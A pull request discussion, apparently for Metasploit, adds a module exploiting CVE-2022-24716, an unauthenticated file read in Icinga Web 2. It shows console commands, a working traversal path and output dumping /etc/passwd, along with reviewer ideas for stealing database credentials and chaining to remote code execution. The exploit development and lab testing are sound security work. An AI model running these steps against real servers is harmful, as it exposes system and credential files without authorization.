Icinga Web 2 Arbitrary File Read (CVE-2022-24716)

[h00die]

This PR adds a module to exploit CVE-2022-24716, an unauthenticated absolute path remote file read in Icinga Web 2.

Verification

• Install the application
• Start msfconsole
• Do: use auxiliary/scanner/http/icinga_static_library_file_directory_traversal
• Do: set rhosts [ip]
• Do: set file [file]
• Do: run
• You should be able to retrieve a file

[bwatters-r7]

Testing

msf6 auxiliary(scanner/http/icinga_static_library_file_directory_traversal) > show options

Module options (auxiliary/scanner/http/icinga_static_library_file_directory_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   File       /etc/passwd      yes       File to retrieve
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.5.134.1/24    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI of the Icinga Application
   THREADS    16               yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/http/icinga_static_library_file_directory_traversal) > run

[*] Scanned  27 of 256 hosts (10% complete)
[*] Scanned  52 of 256 hosts (20% complete)
[*] Scanned  77 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[+] root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

[+] /etc/passwd saved to /home/tmoose/.msf4/loot/20230424145659_default_10.5.134.153_icingafile_843078.txt
[*] Scanned 156 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 232 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/icinga_static_library_file_directory_traversal) > 

[gwillcox-r7]

Given that GHSA-5p3f-rh28-8frw mentions rotating the database credentials I'd also recon it might be an idea to update this module to allow grabbing the creds from the target and save those into the Metasploit database for later cracking?

Otherwise module looks good, below are some thoughts for future improvement:

According to https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/ you should be able to combine this with CVE-2022-24715 to get RCE on the target. I'd be happy to update this later and land this module as is, or explore this further if you don't have the time, but something to consider 👍

[gwillcox-r7]

Hmm odd the default config you have doesn't work. A GET request to /lib/icinga/icinga-php-thirdparty/etc/icinga2/icinga2.conf results in a 404. Requesting /lib/icinga/icinga-php-thirdparty/etc/passwd works fine though.

[gwillcox-r7]

The database file should be stored at /etc/icingadb/config.yml however this is not set up in the Docker image that we install. Similarly the /etc/icinga2/ folder doesn't exist on the Docker image and there is no /etc/icingaweb2/icinga2.conf file either.

[gwillcox-r7]

Copy of the run to showcase what I mean:

msf6 > use auxiliary/scanner/http/
Display all 286 possibilities? (y or n)
msf6 > use auxiliary/scanner/http/icinga_static_library_file_directory_traversal 
msf6 auxiliary(scanner/http/icinga_static_library_file_directory_traversal) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(scanner/http/icinga_static_library_file_directory_traversal) > set RPORT 8080
RPORT => 8080
msf6 auxiliary(scanner/http/icinga_static_library_file_directory_traversal) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/icinga_static_library_file_directory_traversal) > set FILE /etc/passwd
FILE => /etc/passwd
msf6 auxiliary(scanner/http/icinga_static_library_file_directory_traversal) > run

[+] root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

[+] /etc/passwd saved to /home/gwillcox/.msf4/loot/20230502154051_default_127.0.0.1_icingafile_675989.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/icinga_static_library_file_directory_traversal) >

[gwillcox-r7]

@msjenkins-r7 Test this please!

[h00die]

Hmm odd the default config you have doesn't work. A GET request to /lib/icinga/icinga-php-thirdparty/etc/icinga2/icinga2.conf results in a 404. Requesting /lib/icinga/icinga-php-thirdparty/etc/passwd works fine though.

correct. The default is the config file location mentioned in the docs. this should be the default as its the most common case. Unfortunately docker puts it in a different location, so /etc/passwd is a good alternative

[gwillcox-r7]

Hmm odd the default config you have doesn't work. A GET request to /lib/icinga/icinga-php-thirdparty/etc/icinga2/icinga2.conf results in a 404. Requesting /lib/icinga/icinga-php-thirdparty/etc/passwd works fine though.

correct. The default is the config file location mentioned in the docs. this should be the default as its the most common case. Unfortunately docker puts it in a different location, so /etc/passwd is a good alternative

Let me do a quick update to the docs to account for this then should be good to land 👍

[gwillcox-r7]

Release Notes

A new module has been added in for CVE-2022-24716, an unauthenticated arbitrary file read in Icinga Web 2 versions 2.9.0 to 2.9.5 inclusive, and 2.8.0 to 2.8.5 inclusive that can be used to leak sensitive configuration information from a target server.